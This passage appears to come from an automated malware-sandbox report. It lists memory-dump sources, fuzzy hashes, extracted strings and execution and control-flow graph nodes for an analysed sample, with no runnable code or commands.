                                      • Instruction ID: e748ac77dd932a3f65af7c82f1683ce61c78c0a37c2c9c647c86ae2c6fba2581
                                      • Opcode Fuzzy Hash: 59f917cb7c93a1d43cf6b30de177fcb4d23e3fde06a377e5ebd2c3f98f0e9256
                                      • Instruction Fuzzy Hash: 5FD02231722B2863822CB22F10802EFB1CFAF90710BC0843BF00D82211EED0ACD00ACD
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d549c6818575e292e8aadb67713346e483a9f76684bb0c71b3e92cf2c3ba7bd3
                                      • Instruction ID: 7129ddfb491db6cc5beb2bbca1e5d9adf7db908e476fb53dbf918ff0d779e1c3
                                      • Opcode Fuzzy Hash: d549c6818575e292e8aadb67713346e483a9f76684bb0c71b3e92cf2c3ba7bd3
                                      • Instruction Fuzzy Hash: AFE0E238A012149FDB24DB24DE58B98BBF2AF5A200F0140E5E90AD3362CB309E85DF01
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bcf13bc4c53c83c3396e3602c2555aa52872a973748d0a12562e9d9bdd56d230
                                      • Instruction ID: 34d6a0225ad67b27b8a57f721274a75af61aa40b60fd556997099a496316c546
                                      • Opcode Fuzzy Hash: bcf13bc4c53c83c3396e3602c2555aa52872a973748d0a12562e9d9bdd56d230
                                      • Instruction Fuzzy Hash: B6C01231401209ABC320DFB998197597B98DB16201F004065D50883110E67549949A62
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a8d362bfd582aed848b1311ddb8d71717d8b32fab2a9f6908e01bbad7872fe1
                                      • Instruction ID: 89a1bb1eee2258b0aa5890dc269afbc05f66c783621a10f48663c2911c052251
                                      • Opcode Fuzzy Hash: 2a8d362bfd582aed848b1311ddb8d71717d8b32fab2a9f6908e01bbad7872fe1
                                      • Instruction Fuzzy Hash: 0CC04C5818DB819BCB1A57605914141BF317D0360334586C2C0D985562DB165816C3A2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: fp$ fp$Tep$XXp$XXp$XXp$$p$$p$$p$$p
                                      • API String ID: 0-355809937
                                      • Opcode ID: f42c79d0cb92e05354afa3433d8b0c2467ddaf617ea12b0d96350c9077307fee
                                      • Instruction ID: 82477284162d4945be0b8d87a601e184d2c873ea9741d69a1411fb703c407787
                                      • Opcode Fuzzy Hash: f42c79d0cb92e05354afa3433d8b0c2467ddaf617ea12b0d96350c9077307fee
                                      • Instruction Fuzzy Hash: 1AB012A1034414C6C0300328C4015F830C04F127017680462F501C4492D25084B4F745

                                      Execution Graph

                                      Execution Coverage:6.4%
                                      Dynamic/Decrypted Code Coverage:100%
                                      Signature Coverage:0%
                                      Total number of Nodes:73
                                      Total number of Limit Nodes:3
                                      execution_graph 33564 375390 33565 37539c 33564->33565 33581 379188 33565->33581 33567 37548f 33599 5ff740 33567->33599 33568 37556f 33603 478748 33568->33603 33609 478739 33568->33609 33569 375664 33615 514330 33569->33615 33570 375775 33621 509950 33570->33621 33627 509960 33570->33627 33571 375aa8 33583 37918e 33581->33583 33582 37543b 33591 5f6028 33582->33591 33595 5f6038 33582->33595 33583->33582 33633 37e3fb 33583->33633 33637 37e008 33583->33637 33641 37e018 33583->33641 33584 37930b KiUserExceptionDispatcher 33585 379286 33584->33585 33585->33582 33585->33584 33645 5f2ad8 33585->33645 33649 5f2c73 33585->33649 33594 5f6038 33591->33594 33592 5f6439 33592->33567 33593 5f2ad8 LdrInitializeThunk 33593->33594 33594->33592 33594->33593 33598 5f605a 33595->33598 33596 5f6439 33596->33567 33597 5f2ad8 LdrInitializeThunk 33597->33598 33598->33596 33598->33597 33602 5ff762 33599->33602 33600 5ffb7e 33600->33568 33601 5f2ad8 LdrInitializeThunk 33601->33602 33602->33600 33602->33601 33604 47876a 33603->33604 33605 47883d 33604->33605 33606 37e3fb LdrInitializeThunk 33604->33606 33607 37e018 LdrInitializeThunk 33604->33607 33608 37e008 LdrInitializeThunk 33604->33608 33605->33569 33606->33605 33607->33605 33608->33605 33610 478748 33609->33610 33611 47883d 33610->33611 33612 37e3fb LdrInitializeThunk 33610->33612 33613 37e018 LdrInitializeThunk 33610->33613 33614 37e008 LdrInitializeThunk 33610->33614 33611->33569 33612->33611 33613->33611 33614->33611 33616 51434c 33615->33616 33617 5143f7 33616->33617 33618 37e3fb LdrInitializeThunk 33616->33618 33619 37e018 LdrInitializeThunk 33616->33619 33620 37e008 LdrInitializeThunk 33616->33620 33617->33570 33618->33617 33619->33617 33620->33617 33622 509960 33621->33622 33623 509a27 33622->33623 33624 37e3fb LdrInitializeThunk 33622->33624 33625 37e018 LdrInitializeThunk 33622->33625 33626 37e008 LdrInitializeThunk 33622->33626 33623->33571 33624->33623 33625->33623 33626->33623 33628 50997c 33627->33628 33629 509a27 33628->33629 33630 37e3fb LdrInitializeThunk 33628->33630 33631 37e018 LdrInitializeThunk 33628->33631 33632 37e008 LdrInitializeThunk 33628->33632 33629->33571 33630->33629 33631->33629 33632->33629 33636 37e2b3 LdrInitializeThunk 33633->33636 33635 37e550 33635->33585 33636->33635 33640 37e049 33637->33640 33638 37e1a9 33638->33585 33639 37e538 LdrInitializeThunk 33639->33638 33640->33638 33640->33639 33643 37e049 33641->33643 33642 37e1a9 33642->33585 33643->33642 33644 37e538 LdrInitializeThunk 33643->33644 33644->33642 33647 5f2aff 33645->33647 33646 5f2c2a LdrInitializeThunk 33648 5f2c1b 33646->33648 33647->33646 33647->33648 33648->33585 33651 5f2b37 33649->33651 33650 5f2c2a LdrInitializeThunk 33652 5f2c1b 33650->33652 33651->33650 33651->33652 33652->33585

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 251 627278-62727f 252 627275-627276 251->252 253 6272ab-62730e 251->253 252->253 259 627314-627572 253->259 260 627659-6279ae 253->260 316 627574-627589 259->316 317 62758b-62759c 259->317 338 6279b0-6279c5 260->338 339 6279c7-6279d8 260->339 321 62759d-627616 316->321 317->321 333 62761e-627658 321->333 333->260 342 6279d9-627ac5 338->342 339->342 352 627ff5-628029 342->352 353 627acb-627bd5 342->353 356 62827e-6282b2 352->356 357 62802f-62827d 352->357 389 627bdb-627db4 353->389 390 627db9-627fbe call 6283d0 call 628428 call 628480 call 6284d8 353->390 362 6283c4 356->362 363 6282b8-6283c3 356->363 357->356 365 6283c5-6283cc 362->365 363->362 452 627ff4 389->452 455 627fc4-627fc6 390->455 452->352 455->365 455->452
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.625001541.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_620000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$Tep$Gs$Gs
                                      • API String ID: 0-307556097
                                      • Opcode ID: c301835a1ad120f4c10a1161ffa397e26ec2e5be3a0074c8fa4dfec1724e8b58
                                      • Instruction ID: e2c701b8d9b214652f4a2e8f05036da1c9ff088cd9fe2bd72f7e6526ca61f2ee
                                      • Opcode Fuzzy Hash: c301835a1ad120f4c10a1161ffa397e26ec2e5be3a0074c8fa4dfec1724e8b58
                                      • Instruction Fuzzy Hash: 4D82C578A01229CFDB65EF24D894BADB7B2FB89304F2445E9D809A7354CB359E81DF40

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 460 627276-62730e 466 627314-627349 460->466 467 627659-6279ae 460->467 475 627353-627359 466->475 545 6279b0-6279c5 467->545 546 6279c7-6279d8 467->546 477 627364-627572 475->477 523 627574-627589 477->523 524 62758b-62759c 477->524 528 62759d-6275cf 523->528 524->528 534 6275d9-6275eb 528->534 536 6275f6-627602 534->536 538 627609-627616 536->538 540 62761e-627658 538->540 540->467 549 6279d9-627ac5 545->549 546->549 559 627ff5-628029 549->559 560 627acb-627bd5 549->560 563 62827e-6282b2 559->563 564 62802f-62827d 559->564 596 627bdb-627db4 560->596 597 627db9-627dd3 560->597 569 6283c4 563->569 570 6282b8-6283c3 563->570 564->563 572 6283c5-6283cc 569->572 570->569 659 627ff4 596->659 609 627ddd-627df1 call 6283d0 597->609 612 627df7-627e20 609->612 619 627e2a-627e3a call 628428 612->619 620 627e40-627f89 619->620 660 627f94-627fbe call 628480 call 6284d8 620->660 659->559 662 627fc4-627fc6 660->662 662->572 662->659
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.625001541.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_620000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$Tep$Gs$Gs
                                      • API String ID: 0-307556097
                                      • Opcode ID: 722e73996ba10e093bd2f349f6d3632798c72c3cb564aa1757752cbfd8313af6
                                      • Instruction ID: c7392d69ad54af3f0811694e392693263d377cb0757fe767dfb04a85cce6aba1
                                      • Opcode Fuzzy Hash: 722e73996ba10e093bd2f349f6d3632798c72c3cb564aa1757752cbfd8313af6
                                      • Instruction Fuzzy Hash: CE82B578A01229CFDB65EF24D894BADB7B2FB89304F2445E9D809A7354CB359E81DF40
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.625001541.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_620000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8a196d307f30c1ac5903d4d16158384401501016f56175b67b0dfe60c693af59
                                      • Instruction ID: 11686aa457fad555755653c0f8944323eabe63a51afb6095a256678814ae085c
                                      • Opcode Fuzzy Hash: 8a196d307f30c1ac5903d4d16158384401501016f56175b67b0dfe60c693af59
                                      • Instruction Fuzzy Hash: 40A1A374E016298FEB68CF6AD944BDDBBF2AF89300F14C0AAD40CA7250DB345A85CF11
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.624763290.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_500000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a4c3e3eddd3e4693e412768d8b9a71880cc31dd3b2bb27c61b23921048940bf4
                                      • Instruction ID: a654ed8ce673194888118033aca8afb2c7c2f07b19a2a7dbc4bf4004862c00ee
                                      • Opcode Fuzzy Hash: a4c3e3eddd3e4693e412768d8b9a71880cc31dd3b2bb27c61b23921048940bf4
                                      • Instruction Fuzzy Hash: 8E71C274E00219CFEB18DFA9C991AADBBB2BF89300F248529D415BB359DB355D42CF50
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.624763290.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_500000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b35cfd08847132979151df4ccfacbd445b0f220692c7bd704da483da75c99c07
                                      • Instruction ID: 78c6acc30760cda5d422c63244178a172f0a0c23efa63c4f93184cfbf110f413
                                      • Opcode Fuzzy Hash: b35cfd08847132979151df4ccfacbd445b0f220692c7bd704da483da75c99c07
                                      • Instruction Fuzzy Hash: 6A71E174E04219CFDB18DFA9D981AADBBB2BF88300F248529D404AB399DB359D42CF50
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.625001541.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_620000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e3dae1fe40b2ffda46015c748d37b96681176f9e83bbf8eaed5a3aa16fab4ba7
                                      • Instruction ID: 13ca9aa3e1bb1f306d40d440eedf487d7282f62cd0dcfc1261d53a54f8b3b583
                                      • Opcode Fuzzy Hash: e3dae1fe40b2ffda46015c748d37b96681176f9e83bbf8eaed5a3aa16fab4ba7
                                      • Instruction Fuzzy Hash: 2F4167B1E016588BEB58CF6BD95479AFAF3AFC9300F14C1AAD40CA6254DB7409858F51
                                      Memory Dump Source
                                      • Source File: 0000001D.00000002.624763290.0000000000500000.00000040.00000800.00020000.00000000.sdmp, Offset: 00500000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_29_2_500000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0ce6a7a9d8b30da34601dfb0098b4017242d31edff9a32f49e6059585d909faf
                                      • Instruction ID: 8e4f598cdf8dde9c89164260d0e209ba545f908a2480c9a5ba2a78e68a8bdbd2
                                      • Opcode Fuzzy Hash: 0ce6a7a9d8b30da34601dfb0098b4017242d31edff9a32f49e6059585d909faf
                                      • Instruction Fuzzy Hash: D431E174E042498BDB08DFAAD5546EEFBF2BF89300F24D52AD418BB259DB345942CF50